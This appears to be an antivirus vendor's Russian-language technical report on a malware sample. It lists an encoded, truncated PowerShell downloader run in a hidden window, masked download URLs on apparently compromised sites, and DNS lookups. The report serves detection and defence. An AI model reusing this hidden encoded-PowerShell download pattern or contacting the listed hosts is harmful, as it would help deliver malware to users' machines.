Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AXwBfADQANQA9ACgAJwByADUAOQA0ACcAKwAnADIAXwAnACkAOwAkAEYAOAAxADIAXwAwADcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQASQBfAF8ANwBfADMANgA9ACgAJwBoAHQAdABwAD...
- '35.#34.5.71':80
- 'co##ndo.vn':80
- 'co##ndo.vn':443
- 'x1.#.lencr.org':80
- 'ed##nta.com':80
- 'ed##nta.com':443
- http://co##ndo.vn/9PceFpg6P
- http://x1.#.lencr.org/
- http://www.ed##nta.com/wp-content/rVUyl6cvjXvhj
- 'co##ndo.vn':443
- 'ed##nta.com':443
- DNS ASK co##ndo.vn
- DNS ASK x1.#.lencr.org
- DNS ASK ed##nta.com
- DNS ASK pi##uji.com
- DNS ASK be######althcareclub.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AXwBfADQANQA9ACgAJwByADUAOQA0ACcAKwAnADIAXwAnACkAOwAkAEYAOAAxADIAXwAwADcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQASQBfAF8ANwBfADMANgA9ACgAJwBoAHQAdABwAD...' (со скрытым окном)